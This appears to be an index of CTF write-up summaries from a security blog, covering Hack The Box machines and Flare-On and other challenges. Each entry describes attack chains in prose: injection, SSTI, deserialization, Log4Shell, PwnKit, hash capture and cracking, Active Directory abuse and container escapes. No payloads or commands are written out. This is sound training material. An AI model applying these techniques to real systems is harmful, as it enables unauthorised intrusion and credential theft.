HTB: Stackedhackthebox ctf htb-stacked nmap localstack feroxbuster wfuzz vhosts docker docker-compose xss burp burp-repeater xss-referer aws awslocal aws-lambda cve-2021-32090 command-injection pspy container htb-crossfit htb-bankrobber htb-bucket htb-epsilon oscp-plus
Stacked was really hard. The foothold involved identifying XSS in a referer header that landed in an mail application that I could not see. I’ll use the XSS to enumerate that mailbox and find a subdomain used for an instance of localstack. From there, I’ll find I can create Lambda functions, and there’s a command injection vulnerability in the dashboard if it displays a malformed function name. I’ll use the XSS to load that page in an IFrame and trigger the vulnerability, providing a foothold in the localstack container. To escalate in that container, I’ll use Pspy to monitor what happens when localstack runs a lambda function, and find that it is also vulnerable to command injection as root. From root in the container, I can get full access to the host filesystem and a shell. In Beyond Root, I’ll take a look at the mail application and the automations triggering the XSS vulnerabilities.
HTB: Ransomctf hackthebox htb-ransom uhc nmap type-juggling ubuntu php laravel feroxbuster burp burp-repeater zipcrypto known-plaintext crypto bkcrack
Ransom was a UHC qualifier box, targeting the easy to medium range. It has three basic steps. First, I’ll bypass a login screen by playing with the request and type juggling. Then I’ll access files in an encrypted zip archive using a known plaintext attack and bkcrypt. Finally, I’ll find credentials in HTML source that work to get root on the box. In Beyond Root, I’ll look at the structure of a Laravel application, examine how the api requests were handled and how I managed to get JSON data into a GET request, and finally look at the type juggling, why it worked, and how to fix it.
HTB: Devzathackthebox ctf htb-devzat nmap ubuntu vhosts wfuzz devzat feroxbuster go git source-code lfi directory-traversal command-injection influxdb cve-2019-20933 jwt pyjwt jwt-io htb-cereal htb-dyplesher htb-travel htb-epsilon
Devzat is centered around a chat over SSH tool called Devzat. To start, I can connect, but there is at least one username I can’t access. I’ll find a pet-themed site on a virtual host, and find it has an exposed git repository. Looking at the code shows file read / directory traversal and command injection vulnerabilities. I’ll use the command injection to get a shell. From localhost, I can access the chat for the first user, where there’s history showing another user telling them about an influxdb instance. I’ll find an auth bypass exploit to read the db, and get the next user’s password. This user has access to the source for a new version of Devzat. Analysis of this version shows a new command, complete with a file read vulnerability that I’ll use to read root’s private key and get a shell over SSH.
HTB: Epsilonhackthebox ctf htb-epsilon nmap feroxbuster git gitdumper source-code flask python aws awscli aws-lambda htb-gobox htb-bolt htb-bucket jwt ssti burp burp-repeater pspy timing-attack cron
Epsilon originally released in the 2021 HTB University CTF, but later released on HTB for others to play. In this box, I’ll start by finding an exposed git repo on the webserver, and use that to find source code for the site, including the AWS keys. Those keys get access to lambda functions which contain a secret that is reused as the secret for the signing of JWT tokens on the site. With that secret, I’ll get access to the site and abuse a server-side template injection to get execution and an initial shell. To escalate to root, there’s a backup script that is creating tar archives of the webserver which I can abuse to get a copy of root’s home directory, including the flag and an SSH key for shell access.
HTB: Hancliffehtb-hancliffe hackthebox ctf nmap hashpass nuxeo uri-parsing feroxbuster ssti java windows unified-remote tunnel chisel msfvenom firefox firepwd winpeas evil-winrm youtube htb-seal htb-logforge reverse-engineering ghidra x32dbg rot-47 atbash cyberchef pattern-create bof jmp-esp metasm nasm socket-reuse shellcode pwntools wmic dep
Hancliffe starts with a uri parsing vulnerability that provides access to an internal instance of Nuxeo, which is vulnerable to a Java server-side template injection that leads to RCE. With a foothold, I can tunnel to access an instance of Universal Remote, which allows RCE as the next user. That user has a stored password in Firefox for H@$hPa$$, which gives the password for the next user. Finally, this user has access to a development application that is vulnerable to an interesting and tricky buffer overflow, where I’ll have to jump around on the stack and use socket reuse to get execution as administrator.
HTB: Objecthackthebox htb-object ctf uni-ctf nmap iis windows feroxbuster wfuzz jenkins cicd firewall windows-firewall jenkins-credential-decryptor pwn-jenkins evil-winrm crackmapexec bloodhound sharphound active-directory github forcechangepassword genericwrite writeowner logon-script powerview scheduled-task powershell htb-jeeves oscp-like
Object was tricky for a CTF box, from the HackTheBox University CTF in 2021. I’ll start with access to a Jenkins server where I can create a pipeline (or job), but I don’t have permissions to manually tell it to build. I’ll show two ways to get it to build anyway, providing execution. I’ll enumerate the firewall to see that no TCP traffic can reach outbound, and eventually find credentials and get a connection over WinRM. From there, it’s three hops of Active Directory abuse, all made clear by BloodHound. First a password change, then abusing logon scripts, and finally some group privileges. In Beyond Root, I’ll enumerate the automation that ran the logon scripts as one of the users.
HTB: Driverctf hackthebox htb-driver nmap windows feroxbuster net-ntlmv2 scf responder hashcat crackmapexec evil-winrm cve-2019-19363 winpeas powershell history powershell-history printer metasploit exploit-suggestor windows-sessions printnightmare cve-2021-1675 invoke-nightmare htb-sizzle
Drive released as part of the HackTheBox printer exploitation track. To get access, there’s a printer web page that allows users to upload to a file share. I’ll upload an scf file, which triggers anyone looking at the share in Explorer to try network authentication to my server, where I’ll capture and crack the password for the user. That password works to connect to WinRM, providing a foothold to Driver. To escalate, I can exploit either a Ricoh printer driver or PrintNightmare, and I’ll show both.
HTB: GoodGameshtb-goodgames hackthebox ctf uni-ctf vhosts sqli sqli-bypass sqli-union feroxbuster burp burp-repeater ssti docker escape docker-mount htb-bolt
GoodGames has some basic web vulnerabilities. First there’s a SQL injection that allows for both a login bypass and union injection to dump data. The admin’s page shows a new virtualhost, which, after authing with creds from the database, has a server-side template injection vulnerability in the name in the profile, which allows for coded execution and a shell in a docker container. From that container, I’ll find the same password reused by a user on the host, and SSH to get access. On the host, I’ll abuse the home directory that’s mounted into the container and the way Linux does file permissions and ownership to get a shell as root on the host.
HTB: Boltctf hackthebox htb-bolt youtube nmap vhosts wfuzz ffuf docker docker-tar feroxbuster roundcube webmail passbolt dive sqlite hashcat source-code ssti payloadsallthethings password-reuse password-reset credentials chrome john python
Bolt was all about exploiting various websites with different bits of information collected along the way. To start, I’ll download a Docker image from the website, and pull various secrets from the older layers of the image, including a SQLite database and the source to the demo website. With that, I’m able to get into the demo website and exploit a server-side template injection vulnerability to get a foothold on the box. After some password reuse to get to the next user, I’ll go into the user’s Chrome profile to pull out the PGP key associated with their Passbolt password manager account, and use it along with database access to reset the users password and get access to their passwords, including the root password. In Beyond Root, a deep dive into the SSTI payloads used on this box.
HTB: SteamCloudhackthebox htb-steamcloud ctf uni-ctf nmap kubernetes minikube htb-unobtainium kubectl kubeletctl container
SteamCloud just presents a bunch of Kubernetes-related ports. Without a way to authenticate, I can’t do anything with the Kubernetes API. But I also have access to the Kubelet running on one of the nodes (which is the same host), and that gives access to the pods running on that node. I’ll get into one and get out the keys necessary to auth to the Kubernetes API. From there, I can spawn a new pod, mounting the host file system into it, and get full access to the host. I’ll eventually manage to turn that access into a shell as well.
HTB: EarlyAccessctf htb-earlyaccess hackthebox nmap wfuzz vhosts php laravel xss xss-cookies python injection sqli second-order second-order-sqli htb-nightmare command-injection api php-filter source-code burp burp-repeater docker container password-reuse wget escape arp directory-traversal
When it comes to telling a story, EarlyAccess might be my favorite box on HackTheBox. It’s the box of a game company, with fantastic marketing on their front page for a game that turns out to be snake. I’ll need multiple exploits including XSS and second order SQLI to get admin on the signup site, abuse that to move the the game site, and from there to the dev site. From the dev site I’ll find a command injection to get a shell in the website’s docker container. I’ll abuse an API to leak another password to get onto the host. From there its back into another docker container, where I’ll crash the container to get execution and shell as root, getting access to the shadow file and a password for the host. Finally, I’ll abuse capabilities on arp to get read as root, the flag, and the root SSH key. In Beyond root, looking at a couple unintended paths.
HTB: Flusteredhtb-flustered hackthebox ctf uni-ctf nmap feroxbuster wfuzz vhosts squid glusterfs mysql foxyproxy ssti flask docker container azure-storage azure-storage-explorer youtube
Fluster starts out with a coming soon webpage and a squid proxy. When both turn out as dead ends, I’ll identify GlusterFS, with a volume I can mount without auth. This volume has the MySQL data stores, and from it I’ll find Squid credentials. With access to the proxy, I’ll find the application source code, and exploit a server-side template injection vulnerability to get execution. With a foothold, I’ll find the keys necessary to get access to a second Gluster volume, which gives access as user. To root, I’ll connect to a Docker container hosting an emulated Azure Storage, and using a key from the host, pull the root SSH key. In Beyond root, an exploration into Squid and NGINX configs, and a look at full recreating the database based on the files from the remote volume.
FunWare [CactusCon 2022 CTF]ctf cactuscon ctf-funware forensics malware reverse-engineering ftk-imager access-data-file ransomeware pyinstaller pyinstxtractor flare-on-wopr uncompyle6 python firefox firepwd sqlite
Over the weekend, a few of us from Neutrino Cannon competed in the CactusCon 2022 CTF by ThreatSims. PolarBearer and I worked on a challenge called Funware, which was a interesting forensics challenge that starts with a disk image of a system that’d been ransomwared, and leads to understanding the malware, decrypting the files, and finding where it was downloaded from. It was a fun forensics challenge. Thanks to @pwnEIP and @Cone_Virus for the challenge and for getting me the questions after it was over so I could write this up.
HTB: Horizontallctf hackthebox htb-horizontall nmap feroxbuster source-code vhosts strapi cve-2019-18818 cve-2019-19609 command-injection burp burp-repeater laravel phpggc deserialization oscp-like
Horizonatll was built around vulnerabilities in two web frameworks. First there’s discovering an instance of strapi, where I’ll abuse a CVE to reset the administrator’s password, and then use an authenticated command injection vulnerability to get a shell. With a foldhold on the box, I’ll examine a dev instance of Laravel running only on localhost, and manage to crash it and leak the secrets. From there, I can do a deserialization attack to get execution as root. In Beyond Root, I’ll dig a bit deeper on the strapi CVEs and how they were patched.
HTB: Pressedctf htb-pressed hackthebox nmap wordpress uhc burp wpscan totp 2fa xml-rpc python python-wordpress-xmlrpc cyberchef webshell pwnkit cve-2021-4034 pkexec iptables youtube htb-scavenger htb-stratosphere wp-miniorgange
Pressed presents a unique attack vector on WordPress, where you have access to admin creds right from the start, but can’t log in because of 2FA. This means it’s time to abuse XML-RPC, the thing that wpscan shows as a vulnerability on every WordPress instance, is rarely useful. I’ll leak the source for the single post on the site, and see that’s it’s using PHPEverywhere to run PHP from within the post. I’ll edit the post to include a webshell. The firewall is blocking outbound traffic, so I can’t get a reverse shell. The box is vulnerable to PwnKit, so I’ll have to modify the exploit to work over the webshell. After leaking the root flag, I’ll go beyond with a Video where I take down the firewall and get a root shell.
HTB: Anubishackthebox ctf htb-anubis nmap iis crackmapexec vhosts wfuzz feroxbuster ssti xss certificate adcs htb-sizzle youtube openssl certificate-authority client-certificate tunnel chisel proxychains foxyproxy wireshark responder hashcat net-ntlmv2 smbclient jamovi cve-2021-28079 electron javascript certutil certreq certify certificate-template kerberos klist kinit evil-winrm posh-adcs rubeus sharp-collection powerview psexec-py faketime htb-sizzle
Anubis starts simply enough, with a ASP injection leading to code execution in a Windows Docker container. In the container I’ll find a certificate request, which leaks the hostname of an internal web server. That server is handling software installs, and by giving it my IP, I’ll capture and crack the NetNTLMv2 hash associated with the account doing the installs. That account provides SMB access, where I find Jamovi files, one of which has been accessed recently. I’ll exploit these files to get execution and a foothold on the host. To escalate, I’ll find a certificate template that the current user has full control over. I’ll use that control to add smart card authentication as a purpose for the template, and create one for administrator. I’ll show how to do this the more manual way, getting the certificate and then authenticating with Kerveros from my Linux VM. Then I’ll go back and do it again using PoshADCS and Rubeus all on Anubis.
HTB: Forgectf htb-forge hackthebox nmap wfuzz ssrf feroxbuster vhosts filter redirection flask python pdb youtube oscp-like
The website on Forge has an server-side request forgery (SSRF) vulnerability that I can use to access the admin site, available only from localhost. But to do that, I have to bypass a deny list of terms in the given URL. I’ll have the server contact me, and return a redirect to the site I actually want to have it visit. From the admin site, I can see that it too has an SSRF, and it can manage FTP as well. I’ll update my redirect to have it fetch files from the local FTP server, including the user flag and the user’s SSH private key. The user is able to run a Python script as root, and because of how this script uses PDB (the Python debugger), I can exploit the crash to get a shell as root. In Beyond Root, I’ll look at bypassing the filter, and explore the webserver configuration to figure out how the webserver talks FTP.
HTB: Developerctf htb-developer hackthebox youtube nmap feroxbuster django python crypto dnspy ps2exe xls office msoffice excel hashcat reverse-engineering gdb ghidra cyberchef reverse-tab-nabbing flask deserialization sentry postgres
Developer is a CTF platform modeled off of HackTheBox! When I sign up for an account, there are eight real challenges to play across four different categories. On solving one, I can submit a write-up link, which the admin will click. This link is vulnerable to reverse-tab-nabbing, a neat exploit where the writeup opens in a new window, but it can get the original window to redirect to a site of my choosing. I’ll make it look like it logged out, and capture credentials from the admin, giving me access to the Django admin panel and the Sentry application. I’ll crash that application to see Django is running in debug mode, and get the secret necessary to perform a deserialization attack, providing execution and a foothold on the box. I’ll dump the Django hashes from the Postgresql DB for Senty and crack them to get the creds for the next user. For root, there’s a sudo executable that I can reverse to get the password which leads to SSH access as root.
HTB: NodeBlogctf htb-nodeblog hackthebox uhc youtube python nmap feroxbuster nodejs nosql-injection payloadsallthethings xxe node-serialize deserialization json-deserialization mongo mongodump bsondump
This UHC qualifier box was a neat take on some common NodeJS vulnerabilities. First there’s a NoSQL authentication bypass. Then I’ll use XXE in some post upload ability to leak files, including the site source. With that, I’ll spot a deserialization vulnerability which I can abuse to get RCE. I’ll get the user’s password from Mongo via the shell or through the NoSQL injection, and use that to escalate to root. In Beyond Root, a look at characters that broke the deserialization payload, and scripting the NoSQL injection.
HTB: Previsehtb-previse ctf hackthebox nmap execute-after-redirect burp burp-repeater source-code php injection command-injection path-hijack hashcat sudo sqli sqli-insert youtube oscp-like
To get a foothold on Previse, first I’ll exploit an execute after redirect vulnerability in the webpage that allows me access to restricted sites despite not being logged in. From those sites, I’ll create a user for myself and log in normally. Then I get the source to the site, and I’ll find a command injection vulnerability (both using the source and just by enumerating the site) to get a foothold on the box. To escalate, I’ll go into the database and dump the user hashes, one of which cracks to the password for a user on the box. For root, there’s a bash script with a path hijack vulnerability that can run with sudo, allowing for execution. In Beyond Root I’ll look at the standard sudo config and what was changed for Previse, and then look at an unintended SQL injection in an insert statement.
2021 SANS Holiday Hack Challenge, featuring KringleCon 4: Calling Birdsctf sans-holiday-hack
The 2021 SANS Holiday Hack Challenge was the battle of two competing conferences. Santa is hosting the 4th annual KringleCon at the North Pole, and Jack Front has set up a competing conference next door, FrostFest. This years challenge conference included 14 talks from leaders in information security, including a late entry from the elf, Professor Qwerty Petabyte, covering Log4j. In addition to the talks, there were 15 terminals / in-game puzzles and 13 objectives to solve. In solving all of these, the Jack Frost’s plot was foiled. As usual, the challenges were interesting and set up in such a way that it was very beginner friendly, with lots of hints and talks to ensure that you learned something while solving.
Hackvent 2021ctf hackvent python git gitdumper obfuscation brainfuck polyglot jsfuck de4js pil reverse-engineering pcap wireshark nmap content-length ignore-content-length cistercian-numerals code-golf type-juggling ghidra clara-io stl youtube kotlin race-condition p-384 eliptic-curve signing crypto
This year I was only able to complete 14 of the 24 days of challenges, but it was still a good time. I learned something about how web clients handle content lengths, how to obfuscate JavaScript for a golf competition, and exploited some neat crypto to sign commands for a server.
HTB: LogForgectf hackthebox htb-logforge nmap uhc jsp jsessionid tomcat feroxbuster apache-tomcat-parse burp burp-repeater msfvenom war log4shell log4j jndi ysoserial jndi-exploit-kit ysoserial-modified jd-gui reverse-engineering jar wireshark ldap uri-parsing htb-seal htb-pikaboo
LogForge was a UHC box that HTB created entirely focused on Log4j / Log4Shell. To start, there’s an Orange Tsai attack against how Apache is hosting Tomcat, allowing the bypass of restrictions to get access to the manager page. From there, I’ll exploit Log4j to get a shell as the tomcat user. With a foothold on the machine, there’s an FTP server running as root listening only on localhost. This FTP server is Java based, and reversing it shows it’s using Log4j to log usernames. I’ll exploit this to leak the environment variables used to store the username and password needed to access the FTP server, and use that to get access to the root flag. The password also works to get a root shell. In Beyond Root I’ll look at using netcat to read the LDAP requests and do some binary RE of LDAP on the wire.
HTB: Staticctf htb-static hackthebox nmap feroxbuster vpn openvpn totp fixgz oathtool ntp ntpdate route xdebug dbgpClient htb-olympus htb-jewel tunnel socks filter cve-2019-11043 webshell format-string htb-rope gdb aslr socat pspy path-hijack easy-rsa
Static was a really great hard box. I’ll start by finding a corrupted gzipped SQL backup, which I can use to leak the seed for a TOTP 2FA, allowing me access to an internal page. There I’ll get a VPN config, which I’ll use to connect to the network and get access to additional hosts. There’s a web host that has xdebug running on it’s PHP page, allowing for code execution. From there, I’ll pivot to a PKI host that I can only reach from web. I’ll exploit a PHP-FPM bug to get a shell on there. On this box, there’s a binary with setuid capabilities and a format string exploit, which I’ll use to leak addresses and then overwrite the path to a binary called to have it run my reverse shell. In Beyond Root, I’ll look at an unintended Path Hijack in an actual open-source program, easy-rsa.
HTB: Writerhackthebox ctf htb-writer nmap feroxbuster sqli injection auth-bypass ffuf sqlmap burp burp-repeater apache flask django command-injection hashcat postfix swaks apt oscp-plus
Writer was really hard for a medium box. There’s an SQL injection that provides both authentication bypass and file read on the system. The foothold involved either chaining togethers file uploads and file downloads to get a command injection, or using an SSRF to trigger a development site that is editable using creds found in the site files to access SMB. With a shell, the first pivot is using creds from the Django DB after cracking the hash. Then I’ll inject into a Postfix mail filter and trigger it be sending an email. Finally, there’s an editable apt config file that allows command injection as root. In beyond root, I’ll show the intended path using the SSRF to trigger the modified dev site.
HTB: Pikabooctf htb-pikaboo hackthebox nmap debian feroxbuster off-by-slash lfi log-poisoning perl-diamond-injection perl ldap ldapsearch htb-seal oscp-plus
Pikaboo required a lot of enumeration and putting together different pieces to get through each step. I’ll only ever get a shell as www-data and root, but for each step there’s several pieces to pull together and combine to some effect. I’ll start by abusing an off-by-slash vulnerability in the interaction between NGINX and Apache to get access to a staging server. In there, I’ll use an LFI to include FTP logs, which I can poison with PHP to get execution. As www-data, I’ll find a cron running a Perl script as root, which is vulnerable to command injection via the diamond operator. I’ll find creds for another user in LDAP and get access to FTP, where I can drop a file that will be read and give execution to get a shell as root.
HTB: Intelligencectf htb-intelligence hackthebox nmap windows crackmapexec smbmap smbclient smb dns dnsenum ldapsearch exiftool feroxbuster kerbrute python password-spray bloodhound bloodhound-py dnstool responder hashcat readgmsapassword gmsa gmsadumper silver-ticket wmiexec oscp-like
Intelligence was a great box for Windows and Active Directory enumeration and exploitation. I’ll start with a lot of enumeration against a domain controller. Eventually I’ll brute force a naming pattern to pull down PDFs from the website, finding the default password for new user accounts. Spraying that across all the users I enumerated returns one that works. From there, I’ll find a PowerShell script that runs every five minutes on Intelligence that is making a web request to each DNS in the AD environment that starts with web. I’ll add myself as a server, and use responder to capture a hash when it next runs. On cracking that hash, I’ll have a new user, and bloodhound shows that account has control over a service accounts GMSA password. That service account has delegation on the domain. I’ll exploit those relationships to get administrator on the box.
HTB: Unionctf htb-union hackthebox uhc nmap sqli filter waf feroxbuster burp burp-repeater sqli-file credentials injection command-injection sudo iptables
The November Ultimate Hacking Championship qualifier box is Union. There’s a tricky-to-find union SQL injection that will allow for file reads, which leaks the users on the box as well as the password for the database. Those combine to get SSH access. Once on the box, I’ll notice that www-data is modifying the firewall, which is a privileged action, using sudo. Analysis of the page source shows it is command injectable via the X-Forwarded-For header, which provides a shell as www-data. This account has full sudo rights, providing root access.
HTB: BountyHunterctf htb-bountyhunter hackthebox nmap xxe feroxbuster decoder python credentials password-reuse python-eval command-injection
BountyHunter has a really nice simple XXE vulnerability in a webpage that provides access to files on the host. With that, I can get the users on the system, as well as a password in a PHP script, and use that to get SSH access to the host. To privesc, there’s a ticket validation script that runs as root that is vulnerable to Python eval injection.
RunCode Live 2021 Solutionsctf runcode youtube
I’ve been posting solutions on YouTube for the RunCode Live 2021 competition held 11-13 November 2021. This a a programming CTF, so I’ll show how I approach various problems using mostly Python. Check them out, and subscribe on YouTube to get notified as I add more videos.
HTB: Sealhackthebox ctf htb-seal nmap wfuzz vhosts nginx tomcat feroxbuster git-bucket off-by-slash git mutual-authentication uri-parsing war msfvenom ansible htb-tabby oscp-like
In Seal, I’ll get access to the NGINX and Tomcat configs, and find both Tomcat passwords and a misconfiguration that allows me to bypass the certificate-based authentication by abusing differences in how NGINX and Tomcat parse urls. The rest of the box is about Ansible, the automation platform. I’ll abuse a backup playbook being run on a cron to get the next user. And I’ll write my own playbook and abuse sudo to get root.
HTB: Three More PivotAPI Unintendedsctf hackthebox htb-pivotapi windows mssql-shell seimpersonate efspotato sebackupvolume ntfscontrolfile dcsync secretsdump rubeus sharp-collection kerberos ticketconverter ntpdate crackmapexec wmiexec
There were three other techniques that were used as shortcuts on PivotAPI that I thought were worth sharing but that I didn’t have time to get into my original post. xct tipped me off to exploiting Sempersonate using EfsPotato (even after the print spooler was disabled), as well as abusing SeManageVolume to get full read/write as admin. TheCyberGeek and IppSec both showed how to abuse delegation to do a DCSync attack.
HTB: PivotAPIctf hackthebox htb-pivotapi nmap windows active-directory exiftool as-rep-roast getuserspns hashcat mssql mssqlclient bloodhound smbmap smbclient mbox mutt msgconvert reverse-engineering procmon vbs api-monitor crackmapexec mssql-shell mssqlproxy evil-winrm keepass genericall powersploit powerview tunnel dotnet dnspy forcechangepassword laps winpeas powershell-run-as cyberchef seimpersonate printspoofer htb-safe oscp-plus
PivotAPI had so many steps. It starts and ends with Active Directory attacks, first finding a username in a PDF metadata and using that to AS-REP Roast. This user has access to some binaries related to managing a database. I’ll reverse them mostly with dynamic analysis to find the password through several layers of obfuscation, eventually gaining access to the MSSQL service. From there, I’ll use mssqlproxy to tunnel WinRM through the DB, where I find a KeePass DB. Those creds give SSH access, where I’ll then pivot through some vulnerable privileges to get access to a developers share. In there, another binary that I can use to fetch additional creds. Finally, after another pivot through misconfigured privileges, I’ll get access to the LAPS password for the administrator. In Beyond Root, I’ll show some unintended paths.
Flare-On 2021: PetTheKittyflare-on ctf flare-on-petthekitty reverse-engineering youtube wireshark delta-patch dll ghidra python scapy
PetTheKitty started with a PCAP with two streams. The first was used to download and run a DLL malware, and the second was the C2 communications of that malware. The malware and the initial downloader user Windows Delta patches to exchange information. I’ll reverse the binary to understand the algorithm and decode the reverse shell session to find the flag.
HTB: Nunchuckshackthebox ctf htb-nunchucks uhc nmap wfuzz vhosts feroxbuster ssti express express-nunchucks capabilities gtfobins apparmor
October’s UHC qualifying box, Nunchucks, starts with a template injection vulnerability in an Express JavaScript application. There are a lot of templating engines that Express can use, but this one is using Nunchucks. After getting a shell, there’s what looks like a simple GTFObins privesc, as the Perl binary has the setuid capability. However, AppArmor is blocking the simple exploitation, and will need to be bypassed to get a root shell.
Flare-On 2021: knownflare-on ctf flare-on-known reverse-engineering youtube crypto ghidra python
known presented a ransomware file decrypter, as well as a handful of encrypted files. If I can figure out the key to give the decrypter, it will decrypt the files, one of which contains the flag. I’ll use Ghidra to determine the algorithm, then recreate it in Python, and brute force all possible keys to find the right one.
HTB: Explorectf hackthebox htb-explore nmap android adb es-file-explorer cve-2019-6447 credentials tunnel
Explore is the first Android box on HTB. There’s a relatively simple file read vulnerability in ES File Explorer that allows me to read images off the phone, including one with a password in it. With that password I’ll SSH into the phone, and access the Android debug (adb) service, where I can easily get a shell as root.
Flare-On 2021: myaquaticlifeflare-on ctf flare-on-myaquaticlife reverse-engineering upx multimedia-builder mmunbuilder x64dbg ghidra python brute-force
myaquaticlife was a Windows exe built on a really old multimedia framework, Multimedia Builder. I’ll use a project on Github to decompile it back to the framework file, and look at it in the original software. There’s a DLL used as a plugin that tracks the order of clicks on fish, and I can figure out the order to click and get the flag.
Flare-On 2021: beeloginflare-on ctf flare-on-beelogin reverse-engineering javascript jsfuck de4js python bruteforce deobfuscation
beelogin starts with a simple HTML page with five input fields. Diving into the source, there’s almost sixty thousand lines of JavaScript. The vast majority of that ends up being junk that isn’t run. I’ll trim it down to around 30 lines. Then there’s some math to track where each of 64 bytes in the key impact which bytes of the result. Once I have that, I can check for bytes that produce valid JavaScript, and find the key. The result is some obfuscated JavaScript that comes out to be doing the same thing again, on the second half of the key. Once I have both halves, I can get the flag or put the key in and get the page to give it to me.
Flare-On 2021: flarelinuxvmflare-on ctf flare-on-flarelinuxvm reverse-engineering vm cyberchef encoding crypto ghidra ransomware youtube
Flare Linux VM starts with a VM and some ransomware encrypted files. I’ll have to triage, find the malware, and reverse it to understand that it’s using a static key stream to encrypted the files. With that stream, I can decrypt and get the files, which provide a series of CTF puzzles to get a password which I can give to the binary and get the final flag.
HTB: Spooktrolhtb-spooktrol ctf hackthebox nmap api fastapi python feroxbuster reverse-engineering wireshark ghidra burp burp-proxy upload sqlite uhc
spooktrol is another UHC championship box created by IppSec. It’s all about attacking a malware C2 server, which have a long history of including silly bugs in them. In this one, I’ll hijack the tasking message and have it upload a file, which, using a directory traversal bug, allows me to write to root’s authorized keys file on the container. Then, I’ll exploit the C2’s database to write a task to another agent and get a shell on that box. In Beyond Root, I’ll look at an unintended directory traversal vulnerability in the implant download.
Flare-On 2021: spelflare-on ctf flare-on-spel reverse-engineering ghidra unpack shellcode dll x64dbg anti-debug
spel was a Russian nesting doll of binaries. It starts with a giant function that has thousands move instructions setting a single byte at a time into a buffer and then calling it. That buffer is shellcode that loads and calls a DLL. That DLL loads and calls a function from a second DLL. In that DLL, there are a series of checks that cause the program to exit (different file name, network connection), before the flag bytes are eventually decoded from a PNG resource in the original binary, and then scrambled into an order only observable in debug.
Flare-On 2021: antiochflare-on ctf flare-on-antioch reverse-engineering docker docker-tar python ghidra hackvent
antioch was a challenge based on the old movie, Monty Python and the Holy Grail. I’m given a Tar archive, which is a Docker image, the output of a command like
docker save. It has a lot of layer data, but most the layers are not referenced in the manifest. The image does have a single ELF executable in it. Though reversing this binary, I’ll see how it expects input matching the various authors from the metadata in the unused layers, and how each author has an id associated with it. I’ll use the order of those IDs to reconstruct the Docker image to include the files in the right order, and then the new image will give the flag.
HTB: Spiderhackthebox htb-spider ctf nmap flask python flask-cookie payloadsallthethings ssti jinja2 injection sqli sqlmap sqlmap-eval ssti-blind waf filter tunnel xxe
Spider was all about classic attacks in unusual places. There’s a limited SSTI in a username that allows me to leak a Flask secret. I’ll use that to generate Flask cookies with SQL injection payloads inside to leak a user id, and gain admin access on the site. From there, another SSTI, but this time blind, to get RCE and a shell. For root, there’s a XXE in a cookie that allows me to leak the final flag as well as the root ssh key.
Flare-On 2021: wizardcultflare-on ctf flare-on-wizardcult reverse-engineering go python youtube crypto ghidra irc inspircd c2
The last challenge in Flare-On 8 was probably not harder than the ninth one, but it might have been the one I had the most fun attacking. In a mad rush to finish on time, I didn’t take great notes, so instead, I went back and solved it start to finish on YouTube.
Flare-On 2021: credcheckerflare-on ctf flare-on-credchecker reverse-engineering html javascript python youtube
Flare-On 8 got off to an easy start with an HTML page and a login form. The page has JavaScript to accept and check the password, and I’ll show two ways to get the flag - pulling the password and then logging in, and decrypting the flag buffer.
HTB: Dynstrhackthebox ctf htb-dynstr nmap dynamic-dns no-ip feroxbuster dnsenum command-injection injection cyberchef scriptreplay dns nsupdate authorized-keys wildcard php bash passwd oscp-plus
Dynstr was a super neat concept based around a dynamic DNS provider. To start, I’ll find command injection in the DNS / IP update API. Then I’ll find a private key in a script replay of a debugging session and strace logs. I’ll also need to tinker with the DNS resolutions to allow myself to connect over SSH, as the authorized_keys file has restrictions in it. For root, there’s a simple wildcard injection into a script I can run as root, and I’ll show two ways to exploit that. In Beyond Root, a break down of the DNS API, and a look at an unintended flag leak and a dive into Bash variables and number comparisons.
HTB: Monitorsctf htb-monitors hackthebox nmap vhosts wordpress wpscan wp-with-spritz sqli injection exploitdb password-reuse lfi apache-config cacti cve-2020-14295 python systemd crontab docker feroxbuster solr cve-2020-9496 ysoserial docker-escape kernel-module oscp-plus
Monitors starts off with a WordPress blog that is vulnerable to a local file include vulnerability that allows me to read files from system. In doing so, I’ll discover another virtual host serving a vulnerable version of Cacti, which I’ll exploit via SQL injection that leads to code execution. From there, I’ll identify a new service in development running Apache Solr in a Docker container, and exploit that to get into the container. The container is running privilieged, which I’ll abuse by installing a malicious kernel module to get access as root on the host.
HTB: Caphtb-cap hackthebox ctf nmap pcap idor feroxbuster wireshark credentials capabilities linpeas
Cap provided a chance to exploit two simple yet interesting capabilities. First, there’s a website with an insecure direct object reference (IDOR) vulnerability, where the site will collect a PCAP for me, but I can also access other user’s PCAPs, to include one from the user of the box with their FTP credentials, which also provides SSH access as that user. With a shell, I’ll find that in order for the site to collect pcaps, it needs some privileges, which are provided via Linux capabilities, including one that I’ll abuse to get a shell as root.
HTB: Jarmisctf hackthebox htb-jarmis ja3 ja3s jarm tls nmap vhosts ncat feroxbuster fastapi ssrf wfuzz jq metasploit msf-custom-module iptables omigod cve-2021-38647 python flask gopher code-review htb-laser htb-travel uhc
My favorite part about Jarmis was that it is centered around this really neat technology used to fingerprint and identify TLS servers. There’s an application that will scan a given server and report back the Jarm signature, and if that signature matches something potentially malicious in the database, it will do a GET request to that server to collect additional metadata. I’ll abuse that service to get a list of open ports on localhost and find 5985/5986, which are typically WinRM. Given that Jarmis is a Linux host, it’s odd, and it turns out that this is the same port that OMI listens to, and the host is vulnerable to OMIGod. To exploit this, I’ll find a POC and convert it into a Gopher redirect by redirecting the GET request. I’ll need to create a malicious server as well, and I’ll show two ways, using IPTables and a custom Metasploit module. In Beyond Root, I’ll look at the webserver config, and find the error in the public Jarm code that allowed me to use Jarm as a port scanner.
HTB: Pitctf htb-pit hackthebox centos nmap udp snmp feroxbuster snmpwalk seeddms cve-2019-12744 exploitdb webshell upload selinux cockpit htb-sneaky getfacl facl oscp-like
Pit used SNMP in two different ways. First, I’ll enumerate it to leak the location of a webserver running SeedDMS, where I’ll abuse a webshell upload vulnerability to get RCE on the host. I’m not able to get a reverse shell because of SeLinux, but I can enumerate enough to find a password for michelle, and use that to get access to a Cockpit instance which offers a terminal. From there, I’ll find that I can write scripts that will be run by SNMP, and I’ll use that to get execution and a shell as root. In Beyond Root, a look at SeLinux and how it blocked things I tried to do on Pit.
HTB: Sinkhtb-sink hackthebox ctf nmap gitea haproxy gunicorn request-smuggling localstack aws aws-secretsmanager aws-kms iptables htb-bucket htb-gobox git
Sink was an amazing box touching on two major exploitation concepts. First is the request smuggling attack, where I send a malformed packet that tricks the front-end server and back-end server interactions such that the next user’s request is handled as a continuation of my request. After that, I’ll find a AWS instance (localstack) and exploit various services in that, including secrets manager and the key management. In Beyond Root, I’ll look at the way this box was configured to allow for multiple users to do request smuggling at the same time.
